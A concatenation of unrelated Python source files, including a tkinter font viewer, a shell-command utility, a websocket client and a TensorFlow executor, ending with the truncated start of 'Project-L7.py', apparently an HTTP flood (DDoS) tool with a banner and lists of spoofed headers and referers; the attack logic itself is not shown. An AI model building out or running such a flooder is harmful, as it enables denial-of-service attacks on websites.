`(inputs, targets, sample_weights)`. """ while self.is_running(): if not self.queue.empty(): success, value = self.queue.get() # Rethrow any exceptions found in the queue if not success: six.reraise(value.__class__, value, value.__traceback__) # Yield regular values if value is not None: yield value else: all_finished = all([not thread.is_alive() for thread in self._threads]) if all_finished and self.queue.empty(): raise StopIteration() else: time.sleep(self.wait_time) # Make sure to rethrow the first exception in the queue, if any while not self.queue.empty(): success, value = self.queue.get() if not success: six.reraise(value.__class__, value, value.__traceback__)
tkinter_fonts_viewer.py
"""tkinter_fonts_viewer version, date, author: 0.1.1, 31.05.2020, streanger version, date, author: 0.1.2, 07.01.2022, streanger useful: https://stackoverflow.com/questions/5286093/display-listbox-with-columns-using-tkinter https://fsymbols.com/emoticons/ https://stackoverflow.com/questions/70538010/distributing-python-programs-with-a-tkinter-gui-using-pysintaller """ import os import time import json import string import ctypes from threading import Thread from itertools import cycle from tkinter import ( Tk, Frame, Label, Listbox, Entry, Button, StringVar, Scrollbar, Toplevel, messagebox, font, YES, NO, BOTH, TOP, BOTTOM, LEFT, RIGHT, X, Y, END, ) import pkg_resources def static_file_path(directory, file): """ get path of the specified file from specified directory""" resource_path = "/".join((directory, file)) # Do not use os.path.join() try: template = pkg_resources.resource_filename(__name__, resource_path) except KeyError: return ( "none" # empty string cause AttributeError, and non empty FileNotFoundError ) return template def fonts_type(): """get known fonst status""" fonts_file_path = static_file_path("fonts", "fonts_status.json") # read known fonts from json try: with open(fonts_file_path) as json_file: data = json.load(json_file) except FileNotFoundError: data = {} return data def viewer(): """main application gui""" app = TkinterFontsViewer(master=Tk(), resizable=True, hide_console=False) app.mainloop() class FontsMonoCheck(Frame): # pylint: disable=too-many-ancestors """class for testing fonts mono status https://stackoverflow.com/questions/4481880/minimizing-a-tk-window """ def __init__(self, master, fonts): super().__init__(master) self.master.geometry("30x30") self.master.iconify() # minimized window self.test_label = Label(self.master) self.test_label.pack(expand=NO, fill=Y, side=BOTTOM) # fonts = font.families() self.fonts = fonts self.fonts_mono_status = {} self.test_thread = Thread(target=self.check_fonts_thread, args=(self.fonts,)) self.test_thread.start() def cleanup(self): """join thread and destroy window""" self.test_thread.join() self.master.destroy() def check_fonts_thread(self, fonts): """check fonts in thread""" default_color = self.master.cget("bg") for checked_font in fonts: # set proper font test_font = font.Font(family=checked_font, size=11) # invisible color self.test_label.config(font=test_font, fg=default_color) # set '.' as text self.test_label.config(text=".") self.master.update() # this is needed for true width value dot_width = self.test_label.winfo_width() # set 'm' as text self.test_label.config(text="m") self.master.update() # this is needed for true width value m_width = self.test_label.winfo_width() # show & compare sizes status = bool(m_width == dot_width) # out[checked_font] = status self.fonts_mono_status[checked_font] = status self.test_label.pack_forget() self.master.update() # print('inside') time.sleep(0.01) self.master.quit() self.master.update() class TkinterFontsViewer(Frame): # pylint: disable=too-many-ancestors """gui viewer for tkinter fonts""" def __init__(self, master, resizable=True, hide_console=False): # *********** INIT, HIDE, CLOSING *********** if hide_console: self.hide_console() super().__init__(master) self.master.protocol("WM_DELETE_WINDOW", self.on_closing) self.master.geometry("{}x{}+333+50".format(800, 500)) if resizable: self.master.resizable(width=True, height=True) else: self.master.resizable(width=False, height=False) self.master.wm_title("tkinter fonts viewer") self.pack() # *********** APP GUI, CONST, VARIABLES *********** if os.name == "nt": app_font = "Lucida console" else: app_font = "FreeMono" # raised, sunken, flat, ridge, solid, groove self.RELIEF_TYPE = "groove" self.MONO_FONT_INFO = font.Font(family=app_font, size=10, weight="normal") self.MONO_BUTTON = font.Font(family=app_font, size=25, weight="normal") self.MONO_FONT_INFO_UPPER = font.Font(family=app_font, size=12, weight="normal") self.user_text = "" self.test_examples = cycle( [ "\n".join( [ string.digits, string.ascii_lowercase, string.ascii_uppercase, string.punctuation, ] ), "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam...", "I know I can do it, Todd Downey said, helping himself to another ear of corn from the steaming bowl. I’m sure that in time, every bit of her will be gone, and her death will be a mystery. Even to me.", "If you haven't found something strange during the day, it hasn't been much of a day", "\n".join(["❄", "❄❄❄", "☃☃☃☃☃", "❄❄❄", "❄"]), r"¯\_( ͡❛ ͜ʖ ͡❛)_/¯", "", "tkinter fonts viewer", ] ) # *********** FONTS MONO STATUS *********** self.FONTS_MODE = 0 self.FONTS_MODES_DICT = { 0: "all", 1: "normal", 2: "mono", } self.ALL_FONTS = font.families() self.ALL_FONTS = sorted(list(set(self.ALL_FONTS))) # remove duplicates self.FONTS_MONOSPACE_STATUS = self.check_if_mono(self.ALL_FONTS) self.MONO_FONTS = [] self.NORMAL_FONTS = [] for key, value in self.FONTS_MONOSPACE_STATUS.items(): if value: self.MONO_FONTS.append(key) else: self.NORMAL_FONTS.append(key) self.FONTS_TO_SHOW = self.ALL_FONTS # current fonts to show self.FILTER = "" self.FONTS_FILTERED = self.filter_fonts( self.FONTS_TO_SHOW, self.FILTER # at start show all fonts ) self.NUMBER_OF_FONTS = len(self.FONTS_FILTERED) self.current_font = self.FONTS_FILTERED[0] # *********** CREATE WIDGETS *********** self.default_color = self.master.cget("bg") self.BG_COLOR_MONO = "#ADD8E6" self.BG_COLOR_NORMAL = self.default_color self.create_widgets() # *********** LIFT, GET FOCUS *********** self.master.lift() # move window to the top self.master.focus_force() @staticmethod def hide_console(): """hide console window""" if os.name == "nt": ctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 ) @staticmethod def read_json(file): """read json file, to dict""" try: with open(file) as json_file: data = json.load(json_file) except FileNotFoundError: data = {} return data @staticmethod def write_json(file, data): """write dict, to json file""" with open(file, "w") as json_file: # ensure_ascii -> False/True -> characters/u'type' json.dump(data, json_file, sort_keys=True, indent=4, ensure_ascii=False) def check_if_mono(self, fonts): """check fonts mono status with new window https://stackoverflow.com/questions/16115378/tkinter-example-code-for-multiple-windows-why-wont-buttons-load-correctly """ # get paths fonts_file_path = static_file_path("fonts", "fonts_status.json") fonts_dir_path = static_file_path("fonts", "") # read known fonts from json known_fonts_status = self.read_json(fonts_file_path) known_fonts_keys = list(known_fonts_status.keys()) # compare specified with known, and separate not checked not_checked_fonts = [] specified_fonts_status = {} for font_to_check in fonts: if not font_to_check in known_fonts_keys: not_checked_fonts.append(font_to_check) else: specified_fonts_status[font_to_check] = known_fonts_status[ font_to_check ] if not_checked_fonts: # iter through not checked self.new_window = Toplevel(self.master) test_app = FontsMonoCheck(self.new_window, not_checked_fonts) test_app.mainloop() test_app.cleanup() # append checked fonts to current known checked_fonts = test_app.fonts_mono_status specified_fonts_status = {**specified_fonts_status, **checked_fonts} # store updated dict to json updated_json = {**known_fonts_status, **checked_fonts} if not os.path.exists(fonts_dir_path): os.makedirs(fonts_dir_path) self.write_json(fonts_file_path, updated_json) return specified_fonts_status def on_closing(self): """handle application closing""" if messagebox.askokcancel("Quit", "Do you want to quit?"): self.master.destroy() self.master.quit() def bg_color(self, status): """get bg color depend on status""" if status: return self.BG_COLOR_MONO return self.BG_COLOR_NORMAL def perform_center_text(self, text): """perform text(font name), to fit main label""" # make some text manipulations if needed # no wrap for now; dynamic in main label main_font = font.Font(family=self.current_font, size=50, weight="normal") self.main_label.config(font=main_font, text=text) def entry_callback(self, event): """entries callback""" self.user_text = self.main_text_entry.get().strip() # ********* update main label ********* if self.user_text: main_text = self.user_text else: main_text = self.current_font self.perform_center_text(main_text) # set focus on other item self.left_listbox.focus() def filter_callback(self, event): """filter callback""" # ******** perform value ******** value = self.filter_entry.get() self.FILTER = str(value.strip().lower()) # ******** update filtered list ******** self.FONTS_FILTERED = self.filter_fonts(self.FONTS_TO_SHOW, self.FILTER) self.NUMBER_OF_FONTS = len(self.FONTS_FILTERED) # ******** update widgets ******** # update total fonts label self.top_info_left_down.config(text=self.NUMBER_OF_FONTS) # ******** update listbox ******** self.clear_listbox() self.fill_listbox(self.FONTS_FILTERED) self.left_listbox.focus() @staticmethod def filter_fonts(fonts, filter_str): """filter list of fonts""" return [font for font in fonts if filter_str.lower() in font.lower()] def switch_font_mode(self): """switch sound mode""" self.FONTS_MODE = (self.FONTS_MODE + 1) % 3 if self.FONTS_MODE == 0: self.FONTS_TO_SHOW = self.ALL_FONTS elif self.FONTS_MODE == 1: self.FONTS_TO_SHOW = self.NORMAL_FONTS elif self.FONTS_MODE == 2: self.FONTS_TO_SHOW = self.MONO_FONTS # ******** update filtered list ******** self.FONTS_FILTERED = self.filter_fonts(self.FONTS_TO_SHOW, self.FILTER) self.NUMBER_OF_FONTS = len(self.FONTS_FILTERED) # ******** update widgets ******** self.top_info_left_down.config(text=self.NUMBER_OF_FONTS) # update mode label button_text = "{}\n{}".format(" mode ", self.FONTS_MODES_DICT[self.FONTS_MODE],) self.mode_button.config(text=button_text) # ******** update listbox ******** self.clear_listbox() self.fill_listbox(self.FONTS_FILTERED) def items_selected(self, event): """ handle item selected event https://www.pythontutorial.net/tkinter/tkinter-listbox/ """ # ********* get selected item ********* selected_index = self.left_listbox.curselection() if not selected_index: return None selected_item = self.left_listbox.get(selected_index) self.current_font = selected_item # print("[*] {}: {}".format(selected_index, selected_item)) # ********* update main label ********* if self.user_text: main_text = self.user_text else: main_text = selected_item self.perform_center_text(main_text) return None def clear_listbox(self): """clear fonts listbox""" self.left_listbox.delete(0, END) def fill_listbox(self, values): """fill fonts listbox""" for index, value in enumerate(values): self.left_listbox.insert(END, value) # check mono status if self.FONTS_MONOSPACE_STATUS[value]: self.left_listbox.itemconfig(index, bg="#9ae9f5") def switch_example_text(self): """switch example text to show on main label""" self.main_text_entry.delete(0, END) self.user_text = next(self.test_examples) self.main_text_entry.insert(0, self.user_text) self.perform_center_text(self.user_text) def create_widgets(self): """create widgets from dict object""" # ********* bind key event for master widget ********* self.main_frame = Frame(self.master) self.main_frame.pack(expand=YES, fill=BOTH, side=BOTTOM) # ********* listbox ********* self.left_listbox = Listbox(self.main_frame) self.left_listbox.pack(expand=NO, fill=BOTH, side=LEFT) self.left_scrollbar = Scrollbar(self.main_frame) self.left_scrollbar.pack(expand=NO, fill=BOTH, side=LEFT) self.fill_listbox(self.FONTS_TO_SHOW) self.left_listbox.config(yscrollcommand=self.left_scrollbar.set, width=0) self.left_scrollbar.config(command=self.left_listbox.yview) self.left_listbox.bind("<<ListboxSelect>>", self.items_selected) # ********* RIGHT FRAME ********* self.right_frame = Frame(self.main_frame) self.right_frame.pack(expand=YES, fill=BOTH, side=RIGHT) # right top info self.top_info = Frame(self.right_frame) self.top_info.pack(expand=NO, fill=X, side=TOP) # ********* mono-normal switch button ********* button_text = "{}\n{}".format(" mode ", self.FONTS_MODES_DICT[self.FONTS_MODE]) self.top_button_frame = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_button_frame.pack(expand=YES, fill=BOTH, side=LEFT) self.mode_button = Button( self.top_button_frame, font=self.MONO_FONT_INFO_UPPER, text=button_text, command=self.switch_font_mode, ) self.mode_button.pack(expand=YES, fill=X, side=TOP) # ********* example button ********* self.example_button = Button( self.top_info, font=self.MONO_FONT_INFO_UPPER, text="example", command=self.switch_example_text, ) self.example_button.pack(expand=YES, fill=BOTH, side=LEFT) # ********* number of fonts ********* self.top_info_left = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_info_left.pack(expand=YES, fill=BOTH, side=LEFT) self.top_info_left_up = Label( self.top_info_left, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="total fonts", ) self.top_info_left_up.pack(expand=YES, fill=X, side=TOP) self.top_info_left_down = Label( self.top_info_left, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="{}".format(self.NUMBER_OF_FONTS), ) self.top_info_left_down.pack(expand=YES, fill=X, side=BOTTOM) # ********* text entry ********* entries_size = 13 self.top_info_center_left = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_info_center_left.pack(expand=YES, fill=BOTH, side=LEFT) self.top_info_center_left_up = Label( self.top_info_center_left, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="text", ) self.top_info_center_left_up.pack(expand=YES, fill=X, side=TOP) self.top_info_center_left_entry_sv = StringVar() self.main_text_entry = Entry( self.top_info_center_left, width=entries_size, font=self.MONO_FONT_INFO_UPPER, textvariable=self.top_info_center_left_entry_sv, justify="center", ) self.main_text_entry.bind("<Return>", self.entry_callback) self.main_text_entry.pack(expand=YES, fill=X, side=BOTTOM) # ********* search entry ********* self.top_filter_frame = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_filter_frame.pack(expand=YES, fill=BOTH, side=LEFT) self.top_filter_label = Label( self.top_filter_frame, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="search", ) self.top_filter_label.pack(expand=YES, fill=X, side=TOP) self.top_filter_sv = StringVar() self.filter_entry = Entry( self.top_filter_frame, width=entries_size, font=self.MONO_FONT_INFO_UPPER, textvariable=self.top_filter_sv, justify="center", ) self.filter_entry.bind("<Return>", self.filter_callback) self.filter_entry.pack(expand=YES, fill=X, side=BOTTOM) # ********* MAIN LABEL CONTENT ********* starting_font = self.FONTS_FILTERED[0] main_font = font.Font(family=starting_font, size=50, weight="normal") self.main_label = Label( self.right_frame, relief=self.RELIEF_TYPE, font=main_font, text=starting_font, ) self.main_label.pack(expand=YES, fill=BOTH, side=BOTTOM) # dynamically wrap text in label self.main_label.bind( "<Configure>", lambda x: self.main_label.config(wraplength=self.main_label.winfo_width()), ) return True if __name__ == "__main__": viewer()
system.py
import logging import os import subprocess import sys import threading import time import traceback import re logger = logging.getLogger(__name__) def read_file(filename, ignore_error=False): output = [] try: fh = open(filename, "r") for line in fh: output.append(line.strip()) fh.close() except: logger.error(traceback.format_exc()) if not ignore_error: raise return output def write_file(filename, contents, mode="w", ignore_error=False): try: fh = open(filename, mode) for line in contents: fh.write(line) fh.write("\n") fh.close() except: logger.error(traceback.format_exc()) if not ignore_error: raise def remove_file(filename, recursive=False): if recursive: run_shell_command("rm -rf \"%s\"" % filename, use_sudo=True, ignore_error=True) else: run_shell_command("rm -f \"%s\"" % filename, use_sudo=True, ignore_error=True) def get_pid_children(pid, recursive=False): pidlist = run_shell_command("ps --ppid %s -o pid=" % pid, ignore_error=True, log_error_as=None)[1] if not recursive: return pidlist temp_list = [p for p in pidlist] for p in temp_list: pidlist.extend(get_pid_children(p, recursive=recursive)) return pidlist def kill_pid(pid, signal="15", children=False, recursive=False): pidlist = [str(pid)] if children: pidlist.extend(get_pid_children(pid, recursive=recursive)) run_shell_command("kill -s %s %s" % (signal, " ".join(pidlist).strip()), use_sudo=True, log_cmd_as=logging.INFO) def run_background_command(command, use_sudo=False, sudo_user="root", sudo_login=False, log_cmd_as=logging.DEBUG): logger.log(log_cmd_as, "Executing background command: %s" % command) subprocess.Popen(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) class CommandFailureError(Exception): def __init__(self, cmd): msg = "Command failed: %s" % cmd super().__init__(msg) class CommandTimeoutError(Exception): def __init__(self, cmd): msg = "Command timed out: %s" % cmd super().__init__(msg) def run_shell_command(command, cmd_input=None, use_sudo=False, sudo_user="root", sudo_login=False, timeout=480, ignore_error=False, log_error_as=logging.WARN, log_cmd_as=logging.DEBUG, output_to_file=False, mask_text=[], use_stdout=False, pidfile=None): outfile_name = "/tmp/bdg-%s-%s-out.txt" % (os.getpid(), int(time.time())) outfile = open(outfile_name, "w") if cmd_input is not None: infile_name = "/tmp/bdg-%s-%s-in.txt" % (os.getpid(), int(time.time())) infile = open(infile_name, "w") for line in cmd_input: infile.write(line + "\n") infile.close() infile = open(infile_name, "r") else: infile_name = None infile = None log_command = command for text in mask_text: log_command = re.sub(text, "xxxx", log_command) log_command_full = log_command if use_sudo: sudo_prefix = "sudo -n" # General prefix: no password prompt if sudo_user != "root": sudo_prefix = sudo_prefix + " -u '%s'" % sudo_user # Add "-u username" if sudo_login: sudo_prefix = sudo_prefix + " -i" # Add -i to create login shell command = sudo_prefix + " " + command log_command_full = sudo_prefix + " " + log_command logger.log(log_cmd_as, "Executing command: " + log_command_full) if use_stdout: stdout = sys.stdout else: stdout = outfile proc = subprocess.Popen(command, stdin=infile, stdout=stdout, stderr=subprocess.STDOUT, shell=True) if pidfile is not None: with open(pidfile, "w") as f: f.write("{}".format(proc.pid)) thread_proc = threading.Thread(target=proc.communicate) thread_proc.start() thread_proc.join(timeout) if thread_proc.is_alive(): logger.error("Timed out (%d seconds) waiting for command to complete: %s" % (timeout, log_command_full)) try: kill_pid(proc.pid, children=True, recursive=True) except: logger.warning(traceback.format_exc()) logger.warning("Failed to kill process %d and/or its children" % proc.pid) outfile.close() if infile: infile.close() os.remove(infile_name) cmd_result = read_file(outfile_name, ignore_error=True) os.remove(outfile_name) logger.info("Output of timed out command: %s" % cmd_result) raise CommandTimeoutError(log_command) outfile.close() if infile: infile.close() os.remove(infile_name) if output_to_file: # caller will be responsible for reading and deleting this file cmd_result = outfile_name else: cmd_result = read_file(outfile_name, ignore_error=True); os.remove(outfile_name); if proc.returncode != 0: if log_error_as is not None: logger.log(log_error_as, "Return code %d: %s" % (proc.returncode, log_command_full)) if (not output_to_file) and (len(cmd_result) > 0): logger.log(log_error_as, "Ouput: %s" % str(cmd_result)) if not ignore_error: if len(cmd_result) > 0 and len(cmd_result) < 4: raise CommandFailureError("; ".join(cmd_result)) else: raise CommandFailureError(log_command) return proc.returncode, cmd_result
generic_websocket.py
""" Module used as a interfeace to describe a generick websocket client """ import asyncio import websockets import socket import json import time from threading import Thread, Lock from pyee import AsyncIOEventEmitter from ..utils.custom_logger import CustomLogger # websocket exceptions from websockets.exceptions import ConnectionClosed, InvalidStatusCode class AuthError(Exception): """ Thrown whenever there is a problem with the authentication packet """ pass def is_json(myjson): try: json_object = json.loads(myjson) except ValueError as e: return False return True class Socket(): def __init__(self, sId): self.ws = None self.isConnected = False self.isAuthenticated = False self.id = sId self.lock = Lock() def set_connected(self): self.isConnected = True def set_disconnected(self): self.isConnected = False def set_authenticated(self): self.isAuthenticated = True def set_unauthenticated(self): self.isAuthenticated = False def set_websocket(self, ws): self.ws = ws async def send(self, data): with self.lock: await self.ws.send(data) def _start_event_worker(): return AsyncIOEventEmitter() class GenericWebsocket: """ Websocket object used to contain the base functionality of a websocket. Inlcudes an event emitter and a standard websocket client. """ logger = CustomLogger('BfxWebsocket', logLevel="DEBUG") def __init__(self, host, logLevel='INFO', max_retries=5, create_event_emitter=None): self.host = host self.logger.set_level(logLevel) # overide 'error' event to stop it raising an exception # self.events.on('error', self.on_error) self.ws = None self.max_retries = max_retries self.attempt_retry = True self.sockets = {} # start separate process for the even emitter create_ee = create_event_emitter or _start_event_worker self.events = create_ee() def run(self): """ Start the websocket connection. This functions spawns the initial socket thread and connection. """ self._start_new_socket() event_loop = asyncio.get_event_loop() if not event_loop or not event_loop.is_running(): while True: time.sleep(1) def get_task_executable(self): """ Get the run indefinitely asyncio task """ return self._run_socket() def _start_new_async_socket(self): loop = asyncio.new_event_loop() loop.run_until_complete(self._run_socket()) def _start_new_socket(self, socketId=None): if not socketId: socketId = len(self.sockets) worker = Thread(target=self._start_new_async_socket) worker.start() return socketId def _wait_for_socket(self, socket_id): """ Block until the given socket connection is open """ while True: socket = self.sockets.get(socket_id, False) if socket: if socket.isConnected and socket.ws: return time.sleep(0.01) def get_socket(self, socketId): return self.sockets[socketId] def get_authenticated_socket(self): for socketId in self.sockets: if self.sockets[socketId].isAuthenticated: return self.sockets[socketId] return None async def _run_socket(self): retries = 0 sId = len(self.sockets) s = Socket(sId) self.sockets[sId] = s loop = asyncio.get_event_loop() while self.max_retries == 0 or (retries < self.max_retries and self.attempt_retry): try: async with websockets.connect(self.host) as websocket: self.sockets[sId].set_websocket(websocket) self.sockets[sId].set_connected() self.logger.info("Websocket connected to {}".format(self.host)) retries = 0 while True: # optimization - wait 0 seconds to force the async queue # to be cleared before continuing await asyncio.sleep(0) message = await websocket.recv() await self.on_message(sId, message) except (ConnectionClosed, socket.error, InvalidStatusCode) as e: self.sockets[sId].set_disconnected() if self.sockets[sId].isAuthenticated: self.sockets[sId].set_unauthenticated() self._emit('disconnected') if (not self.attempt_retry): return self.logger.error(str(e)) retries += 1 # wait 5 seconds befor retrying self.logger.info("Waiting 5 seconds before retrying...") await asyncio.sleep(5) self.logger.info("Reconnect attempt {}/{}".format(retries, self.max_retries)) self.logger.info("Unable to connect to websocket.") self._emit('stopped') async def stop(self): """ Stop all websocket connections """ self.attempt_retry = False for key, socket in self.sockets.items(): await socket.ws.close() self._emit('done') def remove_all_listeners(self, event): """ Remove all listeners from event emitter """ self.events.remove_all_listeners(event) def on(self, event, func=None): """ Add a new event to the event emitter """ if not func: return self.events.on(event) self.events.on(event, func) def once(self, event, func=None): """ Add a new event to only fire once to the event emitter """ if not func: return self.events.once(event) self.events.once(event, func) def _emit(self, event, *args, **kwargs): if type(event) == Exception: self.logger.error(event) self.events.emit(event, *args, **kwargs) async def on_error(self, error): """ On websocket error print and fire event """ self.logger.error(error) async def on_close(self): """ This is used by the HF data server. """ await self.stop() async def on_open(self): """ On websocket open """ pass async def on_message(self, message): """ On websocket message """ pass
executor.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Executor for eager execution.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python import pywrap_tensorflow class Executor(object): """A class for handling eager execution. The default behavior for asynchronous execution is to serialize all ops on a single thread. Having different `Executor` objects in different threads enables executing ops asynchronously in parallel: ```python def thread_function(): executor = executor.Executor(enable_async=True): context.set_executor(executor) a = threading.Thread(target=thread_function) a.start() b = threading.Thread(target=thread_function) b.start() ``` """ def __init__(self, enable_async): self._enable_async = enable_async self._handle = pywrap_tensorflow.TFE_NewExecutor(enable_async) def __del__(self): try: pywrap_tensorflow.TFE_ExecutorWaitForAllPendingNodes(self._handle) pywrap_tensorflow.TFE_DeleteExecutor(self._handle) except TypeError: # Suppress some exceptions, mainly for the case when we're running on # module deletion. Things that can go wrong include the pywrap module # already being unloaded, self._handle. no longer being # valid, and so on. Printing warnings in these cases is silly # (exceptions raised from __del__ are printed as warnings to stderr). pass # 'NoneType' object is not callable when the handle has been # partially unloaded. def is_async(self): return self._enable_async def handle(self): return self._handle def wait(self): pywrap_tensorflow.TFE_ExecutorWaitForAllPendingNodes(self._handle)
Ship.py
import logging from multiprocessing import Process, Manager from threading import Thread import traceback class Ship(object): """ A Ship is used to process a function that would otherwise stall a User Interface or is okay to work in the background. The process is ran and then stored within the ship's container (self.container) which is a python dictionary. Errors are also grabbed and stored for reference later. Methods must return something that can be stored within a Python Dictionary. Attributes: ship_id: String/Int. The name of the ship. processing_type: String. Type of processing to occur. processing_types: String List. The available processing_types. (NOTE: MultiProcessing is faster but more tempermental, especially if Thread Locks are held within modules) """ processing_types = ['thread', 'multiprocessing'] def __init__(self, ship_id, processing_type = 'thread'): self.ship_id = ship_id self.container = {} self.process_type = self.check_process_type(processing_type) def set_sail(self, function, kwarg_dict, daemon = True): """ Starts processing the function. Args are passed as a keyword args dictionary. Args: function: The Function to run. CANNOT BE PASSED AS LAMBDA. kwarg_dict: Dictionary of the keyword arguments of function. daemon: Boolean. Only used if using processing_type thread. (Recommended True) """ self.set_processing_variables(function = function, kwarg_dict = kwarg_dict, daemon = daemon) self.voyage.start() def rejoin_port(self): """Called to rejoin the current process after job completion and data saved.""" self.voyage.join() def storage_wrap(self, _passed_function, kwarg_dict, container): """Wraps the function in a method that stores the result/error within the ship's container dict""" try: result = _passed_function(**kwarg_dict) except Exception as e: result = {"Error Type" : type(e).__name__, "Traceback" : traceback.format_exc().splitlines()[-1], "Full Trace" : traceback.format_exc()} container[self.ship_id] = result def set_processing_variables(self, function, kwarg_dict, daemon = True): """Sets the appropriate processing type and passes on to the storage wrap""" if self.process_type == 'thread': self.container = {} self.voyage = Thread(target = self.storage_wrap, kwargs = self.create_process_kwargs(function = function, kwarg_dict = kwarg_dict), daemon = daemon) elif self.process_type == 'multiprocessing': self.container = Manager().dict() self.voyage = Process(target = self.storage_wrap, kwargs = self.create_process_kwargs(function = function, kwarg_dict = kwarg_dict)) else: raise ValueError("Unknown Process Type %s", process_type) def create_process_kwargs(self, function, kwarg_dict): """Utility Function for passing to storage method""" return {'_passed_function' : function, 'kwarg_dict' : kwarg_dict, 'container' : self.container} def check_process_type(self, process_type): if process_type in self.processing_types: return process_type else: raise ValueError("%s Process Type is Not Supported", process_type)
Project-L7.py
# -*- coding: utf-8 -*- #!/usr/bin/python3 import requests import socket import socks import time import random import threading import sys import ssl import datetime print(''' ▄███████▄ ▄████████ ▄████████ ▄███████▄ ▄████████ ▄████████ ▄████████ ███▄▄▄▄ ████████▄ ▄██████▄ ▄████████ ▄█ ▄████████ ███ ▄████████ ████████▄ ███ █▄ ▄████████ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ▀███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ ▀███▀▀██ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ▄███▄▄▄▄██▀ ▄███▄▄▄ ███ ███ ███ ███ ▄███▄▄▄▄██▀ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ███ ███ ███ ███ ▀ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ▀█████████▀ ▀▀███▀▀▀▀▀ ▀▀███▀▀▀ ▀█████████▀ ▀███████████ ▀▀███▀▀▀▀▀ ▀███████████ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀ ███ ▀███████████ ███ ▀███████████ ███ ███ ███ ███ ▀▀███▀▀▀ ███ ▀███████████ ███ █▄ ███ ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███ ███ ███ ███ ▀ ███ ███ ███ ███ ███ ▄████▀ ███ ███ ██████████ ▄████▀ ███ █▀ ███ ███ ███ █▀ ▀█ █▀ ████████▀ ▀██████▀ ██████████ █████▄▄██ ███ █▀ ▄████▀ ███ █▀ ▀██████▀▄█ ████████▀ ██████████ ███ ███ ███ ███ ▀ ''') time.sleep(1) print(''' ╔╗ ╦ ╦ ╔═╗╔╦╗╔═╗╦═╗╔╗╔╔═╗╦ ╔╦╗╔═╗╔╦╗╔═╗╔╗╔ ╠╩╗╚╦╝ ║╣ ║ ║╣ ╠╦╝║║║╠═╣║ ║║║╣ ║║║║ ║║║║ ╚═╝ ╩ ╚═╝ ╩ ╚═╝╩╚═╝╚╝╩ ╩╩═╝ ═╩╝╚═╝╩ ╩╚═╝╝╚╝ ''') acceptall = [ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n", "Accept-Encoding: gzip, deflate\r\n", "Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n", "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n", "Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n", "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n", "Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n", "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n," "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n", "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n", "Accept: text/html, application/xhtml+xml", "Accept-Language: en-US,en;q=0.5\r\n", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n", "Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",] referers = [ "https://www.google.com/search?q=", "https://check-host.net/", 